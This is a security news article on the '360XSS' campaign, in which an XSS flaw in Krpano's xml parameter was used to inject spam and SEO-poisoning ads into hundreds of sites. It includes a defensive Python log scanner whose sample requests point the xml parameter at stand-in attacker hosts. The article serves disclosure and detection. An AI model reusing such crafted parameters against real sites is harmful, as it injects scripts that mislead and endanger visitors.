A cross-site scripting (XSS) vulnerability within the Krpano framework, a popular tool for embedding 360° images and creating virtual tours, has been exploited to inject malicious scripts into over 350 websites.
This widespread campaign manipulates search engine results and spreads spam advertisements across the internet.
Security researcher Oleg Zaytsev discovered the campaign, dubbed “360XSS,” after stumbling upon a suspicious ad on Google Search that was linked to a Yale University domain.
The ad led to a pornography site, raising Zaytsev’s suspicions and prompting him to investigate.
Zaytsev’s investigation revealed that the Yale University subdomain was running Krpano, and the vulnerability stemmed from the improper handling of the “xml” parameter in the URL.
This parameter, intended for specifying the location of external XML configuration files, could be exploited to inject malicious code.
The attackers used a specially crafted URL containing an XML parameter that redirected visitors to another website.

This website then executed a Base64-encoded payload via an XML document, ultimately injecting malicious scripts into the Krpano-powered site.
The injected scripts then served ads for various questionable products and services, including pornography, diet supplements, and online casinos.
In some instances, the hijacked pages were used to boost YouTube views.
The scale of the campaign is massive, affecting a wide range of websites, including government portals, state government websites, universities, hotel chains, news outlets, car dealerships, and Fortune 500 companies.
Many of these sites attract millions of visitors each month, amplifying the reach of the malicious ads.
The vulnerability lies in a configuration setting called “passQueryParameters,” which, when enabled, allows HTTP parameters from the URL to be passed directly to the Krpano viewer.
While Krpano developers attempted to address this issue in version 1.20.10 by restricting “passQueryParameters” to an allowlist, explicitly adding the XML parameter back onto the allowlist re-introduced the XSS risk.
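As an added illustration (not code from the article or from the Krpano project), the following Python helper reviews web server access logs for requests to a Krpano viewer whose `xml` query parameter points at a configuration file the site does not control, which is the pattern the article describes. The log format, hostnames and paths are constructed sample values, not real indicators.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format; only the fields we need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

def classify_xml_param(value, site_host):
    """Return a reason string if the xml value would load configuration the
    site does not control, or None for the expected same-origin path."""
    v = unquote(value).strip()
    lowered = v.lower()
    if lowered.startswith(("javascript:", "data:", "vbscript:")):
        return "scripted-uri"
    if lowered.startswith("//"):
        return "protocol-relative-external"
    parts = urlsplit(v)
    if parts.scheme in ("http", "https"):
        if parts.hostname and parts.hostname.lower() != site_host.lower():
            return "external-host:" + parts.hostname.lower()
        return None  # absolute URL, but same host as the viewer
    if "://" in v:
        return "unusual-scheme:" + parts.scheme
    return None  # relative path, which is what the viewer normally expects

def find_external_xml_loads(log_lines, site_host):
    """Return (client_ip, timestamp, request_path, reason) for each request
    whose xml parameter is flagged by classify_xml_param."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        for value in parse_qs(urlsplit(path).query, keep_blank_values=True).get("xml", []):
            reason = classify_xml_param(value, site_host)
            if reason:
                findings.append((m.group("ip"), m.group("ts"), path, reason))
    return findings

# Constructed sample log lines; hostnames and paths are placeholders, not real indicators.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2025:12:00:01 +0000] "GET /tour/index.html?xml=tour.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Feb/2025:12:00:02 +0000] "GET /tour/index.html?xml=https%3A%2F%2Fattacker.example%2Fc.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Feb/2025:12:00:03 +0000] "GET /tour/index.html?xml=//cdn.example/evil.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Feb/2025:12:00:04 +0000] "GET /tour/index.html?xml=https://tours.example.edu/tour.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Running `find_external_xml_loads(SAMPLE_LOG, "tours.example.edu")` flags the second and third requests and leaves the two same-origin loads alone; in a real review, the site host would be the viewer's own hostname and the log lines would come from the server.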
Zaytsev also discovered that Krpano’s own website, which hosts live examples of the 360° tour framework, was vulnerable to the same exploit.
The attackers are leveraging the trust and credibility of the compromised domains to achieve higher rankings in search results, a technique known as search engine optimization (SEO) poisoning.
By injecting malicious links and optimizing them with fake review counts and star ratings, the attackers ensure that their ads appear prominently in search results.
For example, the attackers managed to inject a fake article promoting online casinos directly into CNN’s website. Similarly, they targeted Pakistan’s largest news site, geo.tv, with the same tactic.
Following Zaytsev’s responsible disclosure, Krpano developers have released version 1.22.4. This version eliminates support for external configuration via the XML parameter, mitigating the risk of XSS attacks.
Krpano users are advised to update to the latest version and set the “passQueryParameters” setting to “false”. Website owners are also encouraged to use Google Search Console to identify and remove any infected pages.